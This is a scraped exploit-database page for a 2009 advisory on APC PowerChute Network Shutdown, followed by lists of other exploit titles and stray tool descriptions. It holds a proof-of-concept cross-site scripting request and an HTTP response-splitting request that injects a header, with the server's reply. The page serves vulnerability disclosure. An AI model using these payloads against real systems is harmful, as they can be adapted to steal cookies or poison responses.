Menu

Search for hundreds of thousands of exploits

"APC PowerChute Network Shutdown - HTTP Response Splitting / Cross-Site Scripting"

Author

Exploit author

"Digital Security Research Group"

Platform

Exploit platform

java

Release date

Exploit published date

2009-02-26

1
2
3
4
5
6
7
source: https://www.securityfocus.com/bid/33924/info

APC PowerChute Network Shutdown is prone to an HTTP-response-splitting vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. 

1 XSS: GET /security/applet?referrer=>"'><img/src="javascript:alert('DSECRG_XSS')"> 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page" Example ******* GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: Ч�~B, 25 �~Aен 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2009-10-07 "HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities" remote hardware "Digital Security Research Group"
2009-04-21 "SAP cFolders - Cross-Site Scripting / HTML Injection" remote multiple "Digital Security Research Group"
2009-03-31 "SAP MaxDB 7.4/7.6 - 'webdbm' Multiple Cross-Site Scripting Vulnerabilities" remote windows "Digital Security Research Group"
2009-02-26 "APC PowerChute Network Shutdown - HTTP Response Splitting / Cross-Site Scripting" webapps java "Digital Security Research Group"
2009-02-25 "JOnAS 4.10.3 - 'select' Error Page Cross-Site Scripting" webapps java "Digital Security Research Group"
2008-08-18 "Freeway 1.4.1.171 - '/templates/Freeway/boxes/card1.php?language' Traversal Local File Inclusion" webapps php "Digital Security Research Group"
2008-08-18 "Freeway 1.4.1.171 - '/templates/Freeway/boxes/loginbox.php?language' Traversal Local File Inclusion" webapps php "Digital Security Research Group"
2008-08-18 "Freeway 1.4.1.171 - '/includes/modules/faqdesk/faqdesk_article_require.php?language' Traversal Local File Inclusion" webapps php "Digital Security Research Group"
2008-08-18 "Freeway 1.4.1.171 - '/english/account.php?language' Traversal Local File Inclusion" webapps php "Digital Security Research Group"
2008-08-18 "Freeway 1.4.1.171 - '/templates/Freeway/mainpage_modules/mainpage.php?language' Traversal Local File Inclusion" webapps php "Digital Security Research Group"
2008-08-18 "Freeway 1.4.1.171 - '/templates/Freeway/boxes/whos_online.php?language' Traversal Local File Inclusion" webapps php "Digital Security Research Group"
2008-08-18 "Freeway 1.4.1.171 - '/includes/modules/newsdesk/newsdesk_article_require.php?language' Traversal Local File Inclusion" webapps php "Digital Security Research Group"
2008-08-18 "Freeway 1.4.1.171 - '/french/account_newsletters.php?language' Traversal Local File Inclusion" webapps php "Digital Security Research Group"
2008-08-13 "Freeway 1.4.1 - Multiple Input Validation Vulnerabilities" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - 'announcements/announcements.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - 'course_description/index.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - 'calendar/agenda.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - '/claroline/redirector.php?url' Arbitrary Site Redirect" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - 'work/work.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - 'wiki/wiki.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - 'phpBB/reply.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - 'course/index.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - '/phpBB/newtopic.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - 'group/group_space.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - 'exercise/exercise.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - 'phpBB/viewtopic.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-07-15 "Claroline 1.8.9 - 'document/document.php' Cross-Site Scripting" webapps php "Digital Security Research Group"
2008-03-03 "Flyspray 0.9.9 - Information Disclosure/HTML Injection / Cross-Site Scripting" webapps php "Digital Security Research Group"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.